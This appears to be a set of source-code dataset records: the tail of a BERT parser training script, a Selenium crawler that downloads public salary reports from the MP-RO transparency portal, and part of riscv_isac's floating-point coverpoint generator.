        kwargs["bert_model"],
        tag_encoder=tag_encoder,
        label_encoder=label_encoder,
        lstm_layers=kwargs["lstm_layers"],
        lstm_dim=kwargs["lstm_dim"],
        tag_embedding_dim=kwargs["tag_embedding_dim"],
        label_hidden_dim=kwargs["label_hidden_dim"],
        dropout_prob=kwargs["dropout_prob"],
    )
    model.to(device)
    # Prepare optimizer: no weight decay for biases/LayerNorm parameters.
    param_optimizers = list(model.named_parameters())
    if kwargs["freeze_bert"]:
        for p in model.bert.parameters():
            p.requires_grad = False
        param_optimizers = [(n, p) for n, p in param_optimizers if p.requires_grad]
    # Remove the unused BERT pooler parameters; their None grads break apex.
    param_optimizers = [n for n in param_optimizers if "pooler" not in n[0]]
    no_decay = ["bias", "LayerNorm.bias", "LayerNorm.weight"]
    optimizer_grouped_parameters = [
        {
            "params": [
                p for n, p in param_optimizers if not any(nd in n for nd in no_decay)
            ],
            "weight_decay": 0.01,
        },
        {
            "params": [
                p for n, p in param_optimizers if any(nd in n for nd in no_decay)
            ],
            "weight_decay": 0.0,
        },
    ]
    optimizer = BertAdam(
        optimizer_grouped_parameters,
        lr=kwargs["learning_rate"],
        warmup=kwargs["warmup_proportion"],
        t_total=num_train_optimization_steps,
    )
    if kwargs["fp16"]:
        model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
    pretrained_model_file = os.path.join(kwargs["output_dir"], MODEL_FILENAME)
    if kwargs["do_eval"]:
        # Evaluation-only mode: load the saved checkpoint and score on test.
        assert os.path.isfile(
            pretrained_model_file
        ), "Pretrained model file does not exist!"
        logger.info("Loading pretrained model from {}", pretrained_model_file)
        # Load model from file
        params = torch.load(pretrained_model_file, map_location=device)
        model.load_state_dict(params["model"])
        logger.info(
            "Loaded pretrained model (Epoch: {:,}, Fscore: {:.2f})",
            params["epoch"],
            params["fscore"],
        )
        eval_score = eval(
            model=model,
            eval_dataloader=test_dataloader,
            eval_features=test_features,
            eval_trees=test_treebank,
            eval_sentences=test_sentences,
            tag_encoder=tag_encoder,
            device=device,
        )
        neptune.send_metric("test_eval_precision", eval_score.precision())
        neptune.send_metric("test_eval_recall", eval_score.recall())
        neptune.send_metric("test_eval_fscore", eval_score.fscore())
        tqdm.write("Evaluation score: {}".format(str(eval_score)))
    else:
        # Training phase
        global_steps = 0
        start_epoch = 0
        best_dev_fscore = 0
        if kwargs["preload"] or kwargs["resume"]:
            # --preload restores weights only; --resume also restores the
            # optimizer, RNG states, and training counters.
            assert os.path.isfile(
                pretrained_model_file
            ), "Pretrained model file does not exist!"
            logger.info("Resuming model from {}", pretrained_model_file)
            # Load model from file
            params = torch.load(pretrained_model_file, map_location=device)
            model.load_state_dict(params["model"])
            if kwargs["resume"]:
                optimizer.load_state_dict(params["optimizer"])
                torch.cuda.set_rng_state_all(
                    [state.cpu() for state in params["torch_cuda_random_state_all"]]
                )
                torch.set_rng_state(params["torch_random_state"].cpu())
                np.random.set_state(params["np_random_state"])
                random.setstate(params["random_state"])
                global_steps = params["global_steps"]
                start_epoch = params["epoch"] + 1
                best_dev_fscore = params["fscore"]
        else:
            # Refuse to silently overwrite an existing checkpoint.
            assert not os.path.isfile(
                pretrained_model_file
            ), "Please remove or move the pretrained model file to another place!"
        for epoch in trange(start_epoch, kwargs["num_epochs"], desc="Epoch"):
            model.train()
            train_loss = 0
            num_train_steps = 0
            for step, (indices, *_) in enumerate(
                tqdm(train_dataloader, desc="Iteration")
            ):
                ids, attention_masks, tags, sections, trees, sentences = prepare_batch_input(
                    indices=indices,
                    features=train_features,
                    trees=train_parse,
                    sentences=train_sentences,
                    tag_encoder=tag_encoder,
                    device=device,
                )
                # With gold trees supplied, the model returns the training loss.
                loss = model(
                    ids=ids,
                    attention_masks=attention_masks,
                    tags=tags,
                    sections=sections,
                    sentences=sentences,
                    gold_trees=trees,
                )
                if kwargs["gradient_accumulation_steps"] > 1:
                    loss /= kwargs["gradient_accumulation_steps"]
                if kwargs["fp16"]:
                    with amp.scale_loss(loss, optimizer) as scaled_loss:
                        scaled_loss.backward()
                else:
                    loss.backward()
                train_loss += loss.item()
                num_train_steps += 1
                # Step the optimizer only every N accumulated micro-batches.
                if (step + 1) % kwargs["gradient_accumulation_steps"] == 0:
                    optimizer.step()
                    optimizer.zero_grad()
                    global_steps += 1
            # Write logs
            neptune.send_metric("train_loss", epoch, train_loss / num_train_steps)
            neptune.send_metric("global_steps", epoch, global_steps)
            tqdm.write(
                "Epoch: {:,} - Train loss: {:.4f} - Global steps: {:,}".format(
                    epoch, train_loss / num_train_steps, global_steps
                )
            )
            # Evaluate on the dev set after each epoch.
            eval_score = eval(
                model=model,
                eval_dataloader=dev_dataloader,
                eval_features=dev_features,
                eval_trees=dev_treebank,
                eval_sentences=dev_sentences,
                tag_encoder=tag_encoder,
                device=device,
            )
            neptune.send_metric("eval_precision", epoch, eval_score.precision())
            neptune.send_metric("eval_recall", epoch, eval_score.recall())
            neptune.send_metric("eval_fscore", epoch, eval_score.fscore())
            tqdm.write(
                "Epoch: {:,} - Evaluation score: {}".format(epoch, str(eval_score))
            )
            # Save best model (checkpoint includes RNG/optimizer state for --resume).
            if eval_score.fscore() > best_dev_fscore:
                best_dev_fscore = eval_score.fscore()
                tqdm.write("** Saving model...")
                os.makedirs(kwargs["output_dir"], exist_ok=True)
                torch.save(
                    {
                        "epoch": epoch,
                        "global_steps": global_steps,
                        "fscore": best_dev_fscore,
                        "random_state": random.getstate(),
                        "np_random_state": np.random.get_state(),
                        "torch_random_state": torch.get_rng_state(),
                        "torch_cuda_random_state_all": torch.cuda.get_rng_state_all(),
                        "optimizer": optimizer.state_dict(),
                        "model": (
                            model.module if hasattr(model, "module") else model
                        ).state_dict(),
                    },
                    pretrained_model_file,
                )
        tqdm.write("** Best evaluation fscore: {:.2f}".format(best_dev_fscore))
if __name__ == "__main__":
    # Connect to the Neptune project named in the environment, run the CLI,
    # and always try to close the experiment on the way out.
    neptune.init(project_qualified_name=os.getenv("NEPTUNE_PROJECT_NAME"))
    try:
        # Sample local invocation with explicit arguments:
        # main(
        #     [
        #         "--train_file=corpora/WSJ-PTB/02-21.10way.clean.train",
        #         "--dev_file=corpora/WSJ-PTB/22.auto.clean.dev",
        #         "--test_file=corpora/WSJ-PTB/23.auto.clean.test",
        #         "--output_dir=outputs",
        #         "--bert_model=models/bert-base-multilingual-cased",
        #         "--batch_size=32",
        #         "--num_epochs=20",
        #         "--learning_rate=3e-5",
        #         # "--fp16",
        #         # "--do_eval",
        #     ]
        # )
        main()
    finally:
        try:
            neptune.stop()
        except NoExperimentContext:
            # No experiment was created (e.g. startup failed) — nothing to stop.
            pass
| 14,796 | 0 | 91 |
86db363519e8523306b63910a6cef58d83620a83 | 5,033 | py | Python | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 18 | 2019-10-30T01:18:40.000Z | 2022-03-15T11:52:45.000Z | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 174 | 2019-11-01T18:57:16.000Z | 2021-09-18T02:35:27.000Z | mpro/src/crawler.py | dadosjusbr/coletores | 4c03e4fa3b74f8cdd76ed9e039386d6d9dc7cc32 | [
"MIT"
] | 9 | 2020-01-16T16:33:46.000Z | 2022-01-13T07:39:00.000Z | import pathlib
import os
import sys
import time
import shutil
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
BASE_URL = 'https://servicos-portal.mpro.mp.br/web/mp-transparente/contracheque'
BASE_URL_MEMBROS_ATIVOS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FremuneracaoMembrosAtivos.rptdesign&anomes='
BASE_URL_VERBAS_INDENIZATORIAS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FverbasIndenizatoriasMembrosAtivos.rptdesign&anomes='
FLAG = ['remuneracao','verbas-indenizatorias']
REMUNERACAO = 'remuneracao'
VERBAS_INDENIZATORIAS = 'verbas-indenizatorias'
| 39.629921 | 189 | 0.690244 | import pathlib
import os
import sys
import time
import shutil
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
# Landing page of the MP-RO transparency portal ("contracheque" section).
BASE_URL = 'https://servicos-portal.mpro.mp.br/web/mp-transparente/contracheque'
# Report endpoints; the year+month value ("anomes") is appended at download time.
BASE_URL_MEMBROS_ATIVOS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FremuneracaoMembrosAtivos.rptdesign&anomes='
BASE_URL_VERBAS_INDENIZATORIAS = 'https://servicos-portal.mpro.mp.br/plcVis/frameset?__report=..%2FROOT%2Frel%2Fcontracheque%2Fmembros%2FverbasIndenizatoriasMembrosAtivos.rptdesign&anomes='
# The two report types collected for each month.
FLAG = ['remuneracao','verbas-indenizatorias']
REMUNERACAO = 'remuneracao'
VERBAS_INDENIZATORIAS = 'verbas-indenizatorias'
def crawl(month, year, driver_path, output_path):
    """Download every report type for (month, year) and return the CSV paths."""
    pathlib.Path(output_path).mkdir(exist_ok=True)
    browser = setup_driver(driver_path, output_path)
    browser.get(BASE_URL)
    time.sleep(4)  # let the portal finish loading
    downloaded = [
        download(str(month), year, output_path, browser, flag) for flag in FLAG
    ]
    browser.quit()
    return downloaded
def download(month, year, output_path, driver, flag):
    """Drive the portal UI to export one report as CSV and return its path.

    *month* is a 1-based month string used directly as an <option> index,
    *year* must be one of 2018-2020, and *flag* selects the report type
    (REMUNERACAO or VERBAS_INDENIZATORIAS).  The fixed sleeps pace the
    portal's slow page loads.
    """
    driver.get(BASE_URL)
    main_tab = driver.window_handles[0]
    time.sleep(5)
    # Open the link for the requested report type.
    if(flag == REMUNERACAO):
        document_type = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483282_1.3"]/p/span/a')
        document_type.click()
    else:
        document_type = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483282_1.3"]/p/span/span/span/span/span/a')
        document_type.click()
    time.sleep(3)
    # Pick the year from the dropdown (options are listed newest-first).
    select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]')
    select_year.click()
    if(year in ['2018', '2019', '2020']):
        if(year == "2018"):
            select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[4]')
        elif(year == "2019"):
            select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[3]')
        elif(year == "2020"):
            select_year = driver.find_element(By.XPATH, '//*[@id="selectAno"]/option[2]')
        select_year.click()
    time.sleep(1)
    # Pick the month: the option index matches the month number.
    x_path = '//*[@id="selectMes"]/option[' + month + ']'
    current_month = driver.find_element(By.XPATH, x_path)
    current_month.click()
    time.sleep(1)
    new_url = ''
    # Downloading the file: click "show data" (opens a report tab) and build
    # the direct report URL for the chosen period.
    if(flag == REMUNERACAO):
        show_data = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_2483760_1.9"]/table/tbody/tr[4]/td[1]/input')
        show_data.click()
        new_url = BASE_URL_MEMBROS_ATIVOS + year + month + '&nome=&cargo=&lotacao='
    elif(flag == VERBAS_INDENIZATORIAS):
        show_data = driver.find_element(By.XPATH, '//*[@id="article_10154_29101_5313882_1.3"]/table/tbody/tr[4]/td[1]')
        show_data.click()
        new_url = BASE_URL_VERBAS_INDENIZATORIAS + year + month
    new_tab = driver.window_handles[1]
    time.sleep(2)
    driver.get(new_url)
    time.sleep(12)
    # Export dialog: select all columns and confirm the CSV download.
    export = driver.find_element(By.XPATH, '//*[@id="toolbar"]/table/tbody/tr[2]/td[6]/input')
    export.click()
    time.sleep(4)
    select_columns = driver.find_element(By.XPATH, '//*[@id="simpleExportDialogBody"]/tbody/tr[5]/td[2]/table/tbody/tr/td/table/tbody/tr[1]/td')
    select_columns.click()
    download = driver.find_element(By.XPATH, '//*[@id="simpleExportDataDialogokButton"]')
    download.click()
    # Formating the filename
    time.sleep(5)
    file_name = format_filename(output_path, month, year, flag)
    time.sleep(3)
    # Closing new tabs
    driver.switch_to_window(new_tab)
    driver.close()
    driver.switch_to_window(main_tab)
    return file_name
def setup_driver(driver_path, output_path):
    """Build a headless Chrome driver that downloads files into *output_path*.

    *driver_path* is appended to the current working directory to locate the
    chromedriver binary.
    """
    chromedriver = os.getcwd() + driver_path
    options = webdriver.ChromeOptions()
    for argument in ('--headless', '--no-sandbox', '--disable-setuid-sandbox'):
        options.add_argument(argument)
    options.add_experimental_option("prefs", {"download.default_directory": output_path})
    return webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
def format_filename(output_path, month, year, flag):
    """Rename the most recently downloaded file in *output_path*.

    The newest file in the directory (by creation time) is assumed to be the
    file selenium just downloaded.  It is renamed to
    ``"<month>-<year>-<flag>-membros-ativos.csv"`` and the new absolute path
    is returned.

    :param output_path: directory that receives the browser downloads
    :param month: month string used in the target filename
    :param year: year string used in the target filename
    :param flag: dataset tag embedded in the target filename
    :return: path of the renamed file
    """
    # Newest entry in the download directory == the file just fetched.
    newest = max([os.path.join(output_path, f) for f in os.listdir(output_path)],
                 key=os.path.getctime)
    # The original code built this exact same name in both the REMUNERACAO and
    # the VERBAS_INDENIZATORIAS branches, and raised NameError for any other
    # flag value; one unconditional format covers all cases.
    new_filename = month + "-" + year + "-" + flag + "-membros-ativos" + ".csv"
    new_output_path = os.path.join(output_path, new_filename)
    shutil.move(newest, new_output_path)
    return new_output_path
13b108f53e6ed06f423270b6e26e1becc76b81e8 | 185,198 | py | Python | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | riscv_isac/fp_dataset.py | liweiwei90/riscv-isac | 91ca482dcf809f49defa4d9a9e14e5e3a891a1ea | [
"BSD-3-Clause"
] | null | null | null | from riscv_isac.log import logger
import itertools
import struct
import random
import sys
import math
from decimal import *
# Curated IEEE-754 bit patterns (hex strings) that feed the IBM floating-point
# coverage models below.  The 'f*' lists are 32-bit single-precision encodings,
# the 'd*' lists the 64-bit double-precision counterparts.  Entries generally
# come in +/- pairs (the sign bit toggled in the MSB).
fzero = ['0x00000000', '0x80000000']
fminsubnorm = ['0x00000001', '0x80000001']
fsubnorm = ['0x00000002', '0x80000002', '0x007FFFFE', '0x807FFFFE', '0x00555555', '0x80555555']
fmaxsubnorm = ['0x007FFFFF', '0x807FFFFF']
fminnorm = ['0x00800000', '0x80800000']
fnorm = ['0x00800001', '0x80800001', '0x00855555', '0x80855555', '0x008AAAAA', '0x808AAAAA', '0x55000000', '0xD5000000', '0x2A000000', '0xAA000000']
fmaxnorm = ['0x7F7FFFFF', '0xFF7FFFFF']
finfinity = ['0x7F800000', '0xFF800000']
fdefaultnan = ['0x7FC00000', '0xFFC00000']
fqnan = ['0x7FC00001', '0xFFC00001', '0x7FC55555', '0xFFC55555']
fsnan = ['0x7F800001', '0xFF800001', '0x7FAAAAAA', '0xFFAAAAAA']
fone = ['0x3F800000', '0xBF800000']
# 64-bit (double precision) equivalents of the categories above.
dzero = ['0x0000000000000000', '0x8000000000000000']
dminsubnorm = ['0x0000000000000001', '0x8000000000000001']
dsubnorm = ['0x0000000000000002', '0x8000000000000002','0x0008000000000000', '0x0008000000000002', '0x0001000000000000', '0x8001000000000000','0x8001000000000003','0x8001000000000007']
dmaxsubnorm = ['0x000FFFFFFFFFFFFF', '0x800FFFFFFFFFFFFF']
dminnorm = ['0x0010000000000000', '0x8010000000000000']
dnorm = ['0x0010000000000002', '0x8010000000000002', '0x0011000000000000', '0x8011000000000000', '0x0018000000000000', '0x8018000000000000','0x8018000000000005','0x8018000000000007']
dmaxnorm = ['0x7FEFFFFFFFFFFFFF', '0xFFEFFFFFFFFFFFFF']
dinfinity = ['0x7FF0000000000000', '0xFFF0000000000000']
ddefaultnan = ['0x7FF8000000000000', '0xFFF8000000000000']
dqnan = ['0x7FF8000000000001', '0xFFF8000000000001', '0x7FFC000000000001', '0xFFFC000000000001']
dsnan = ['0x7FF0000000000001', '0xFFF0000000000001', '0x7FF4AAAAAAAAAAAA', '0xFFF4AAAAAAAAAAAA']
# NOTE(review): -1.0 in double precision is 0xBFF0000000000000; the second
# entry below (0xBF80...) decodes to ~-0.0078125, not -1.0 — verify intent.
done = ['0x3FF0000000000000', '0xBF80000000000000']
# Rounding-mode field values iterated by the models (RISC-V encodes
# 0..4 as RNE/RTZ/RDN/RUP/RMM).
rounding_modes = ['0','1','2','3','4']
def ibm_b1(flen, opcode, ops):
    '''
    IBM Model B1 Definition:
        Test all combinations of floating-point basic types, positive and negative, for
        each of the inputs. The basic types are Zero, One, MinSubNorm, SubNorm,
        MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, and
        SNaN.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operands =>
        [Zero, One, MinSubNorm, SubNorm, MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, SNaN]

    Implementation:
        - Dependent on the value of flen, a predefined dataset of floating point values are added.
        - Using the itertools package, an iterative multiplication is performed with two lists to create an exhaustive combination of all the operand values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with the respective rounding mode for that particular opcode.
    '''
    # Pick one representative +/- pair from each basic type for the right width.
    if flen == 32:
        basic_types = fzero + fminsubnorm + [fsubnorm[0], fsubnorm[3]] +\
            fmaxsubnorm + fminnorm + [fnorm[0], fnorm[3]] + fmaxnorm + \
            finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
            [fsnan[0], fsnan[3]] + fone
    elif flen == 64:
        basic_types = dzero + dminsubnorm + [dsubnorm[0], dsubnorm[1]] +\
            dmaxsubnorm + dminnorm + [dnorm[0], dnorm[1]] + dmaxnorm + \
            dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
            [dsnan[0], dsnan[1]] + done
    else:
        logger.error('Invalid flen value!')
        sys.exit(1)

    # the following creates a cross product for ops number of variables
    b1_comb = list(itertools.product(*ops*[basic_types]))
    coverpoints = []
    for c in b1_comb:
        cvpt = ""
        # One "rsN_sign/exp/man" constraint per operand in the combination.
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # Rounding mode is fixed per opcode group so the B1 set stays bounded;
        # different groups exercise different rm encodings.
        if opcode.split('.')[0] in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
            cvpt += 'rm_val == 0'
        elif opcode.split('.')[0] in ["fclass","flt","fmax","fsgnjn"]:
            cvpt += 'rm_val == 1'
        elif opcode.split('.')[0] in ["feq","flw","fsw","fsgnjx"]:
            cvpt += 'rm_val == 2'
        # Everything after ' # ' is a human-readable comment on the coverpoint.
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B1 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b2(flen, opcode, ops, int_val = 100, seed = -1):
    '''
    IBM Model B2 Definition:
        This model tests final results that are very close, measured in Hamming
        distance, to the specified boundary values. Each boundary value is taken as a
        base value, and the model enumerates over small deviations from the base, by
        flipping one bit of the significand.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param int_val: Number to define the range in which the random value is to be generated. (Predefined to 100)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type int_val: int
    :param seed: int

    Abstract Dataset Description:
        Final Results = [Zero, One, MinSubNorm, MaxSubNorm, MinNorm, MaxNorm]
        Operand1 {operation} Operand2 = Final Results

    Implementation:
        - Hamming distance is calculated using an xor operation between a number in the dataset and a number generated using walking ones operation.
        - A random operand value for one of the operands is assigned and based on the result and operation under consideration, the next operand is calculated.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with the respective rounding mode for that particular opcode.
    '''
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        b = '0x00000010'
        e_sz=8
        m_sz = 23
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        b = '0x0000000000000010'
        e_sz=11
        m_sz = 52
    result = []
    b2_comb = []
    opcode = opcode.split('.')[0]
    # Deterministic per-opcode seeds so each opcode gets a reproducible but
    # distinct random stream when the caller did not supply one.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    # Walking-ones: xor the base pattern with a single set bit k, producing
    # results at Hamming distance 1 from each boundary value.
    # NOTE(review): the flip loop and '{:023b}' format cover only 23 bits, which
    # matches the single-precision significand; for flen == 64 (m_sz == 52) the
    # upper significand bits are never flipped — confirm whether intentional.
    for i in range(len(flip_types)):
        k=1
        for j in range (1,24):
            #print('{:010b}'.format(k))
            result.append(['0x'+hex(eval(bin(int('1'+flip_types[i][2:], 16))) ^ eval('0b'+'{:023b}'.format(k)))[3:],' | Result = '+num_explain(flen, '0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:]))+'(0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:])+')^'+str('0x'+hex(eval('0b'+'1'+'{:024b}'.format(k)))[3:])])
            k=k*2
    for i in range(len(result)):
        # Split the target result into sign / exponent / mantissa bit strings.
        bin_val = bin(int('1'+result[i][0][2:],16))[3:]
        rsgn = bin_val[0]
        rexp = bin_val[1:e_sz+1]
        rman = bin_val[e_sz+1:]
        rs1_exp = rs3_exp = rexp
        # rs1/rs3 share the result's exponent with a small random mantissa.
        rs1_bin = bin(random.randrange(1,int_val))
        rs3_bin = bin(random.randrange(1,int_val))
        rs1_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs1_bin)-2)))+rs1_bin[2:])
        rs3_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs3_bin)-2)))+rs3_bin[2:])
        rs1 = fields_dec_converter(flen,'0x'+hex(int('1'+rs1_bin[2:],2))[3:])
        rs3 = fields_dec_converter(flen,'0x'+hex(int('1'+rs3_bin[2:],2))[3:])
        # Solve for rs2 so that opcode(rs1, rs2[, rs3]) lands on the target result.
        if opcode in 'fadd':
            rs2 = fields_dec_converter(flen,result[i][0]) - rs1
        elif opcode in 'fsub':
            rs2 = rs1 - fields_dec_converter(flen,result[i][0])
        elif opcode in 'fmul':
            rs2 = fields_dec_converter(flen,result[i][0])/rs1
        elif opcode in 'fdiv':
            # NOTE(review): when the target result is 0 this branch leaves rs2
            # unassigned from a previous iteration (NameError on the first one)
            # — verify against the fdiv call sites.
            if fields_dec_converter(flen,result[i][0]) != 0:
                rs2 = rs1/fields_dec_converter(flen,result[i][0])
        elif opcode in 'fsqrt':
            rs2 = fields_dec_converter(flen,result[i][0])*fields_dec_converter(flen,result[i][0])
        elif opcode in 'fmadd':
            rs2 = (fields_dec_converter(flen,result[i][0]) - rs3)/rs1
        elif opcode in 'fnmadd':
            rs2 = (rs3 - fields_dec_converter(flen,result[i][0]))/rs1
        elif opcode in 'fmsub':
            rs2 = (fields_dec_converter(flen,result[i][0]) + rs3)/rs1
        elif opcode in 'fnmsub':
            rs2 = -1*(rs3 + fields_dec_converter(flen,result[i][0]))/rs1
        # Round rs2 to single precision through a pack/unpack round trip.
        if(flen==32):
            m = struct.unpack('f', struct.pack('f', rs2))[0]
        elif(flen==64):
            m = rs2
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m)))
        elif opcode in 'fsqrt':
            b2_comb.append((floatingPoint_tohex(flen,m),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m),floatingPoint_tohex(flen,rs3)))
    #print("b2_comb",b2_comb)
    coverpoints = []
    k=0
    for c in b2_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        # Everything after ' # ' is a human-readable comment on the coverpoint.
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += result[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B2 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b3(flen, opcode, ops, seed=-1):
    '''
    IBM Model B3 Definition:
        This model tests all combinations of the sign, significand's LSB, guard bit & sticky bit of the intermediate result.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Intermediate Result is chosen at random
        Intermediate Result = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The Sticky bit is 1 if there were non-zero digits to the right of the guard digit, hence the lsb list is subjected to that condition.
        - Float_val [ a list of numbers ] extracted from the fields_dec_converter is checked for the LSB. If it is a negative number, then the list ieee754_num is appended with splitting the p character and first 10 characters in the 0th split + 'p' + other part of the split. "p" specifies the maximum available number in python and used in 64 bit architecture. If we require a digit more than the number, then we represent it using a string because an int
        - Now the ir_dataset is initialized and since the ieee754_num list has the same element twice [ first is just the number and second is with sign ], hence we loop that array, considering only multiples of 2 elements from it. If the sign is '-', then the index is updated with 1 else if it is '+', then it is updated with 0 complying with the IEEE standards.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    # High Decimal precision: intermediate results may exceed what a 64-bit
    # float can represent.
    getcontext().prec = 40
    # Deterministic per-opcode seeds when the caller did not supply one.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_num = []
        lsb = []
        # For every subnormal/normal base value record its significand LSB and
        # both sign variants of the number.
        for i in fsubnorm+fnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
                ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
            else:
                ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
                ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # Append an extra hex digit i (even values 2..14) after the mantissa to
        # realise every guard/sticky combination; grs = that digit in binary.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
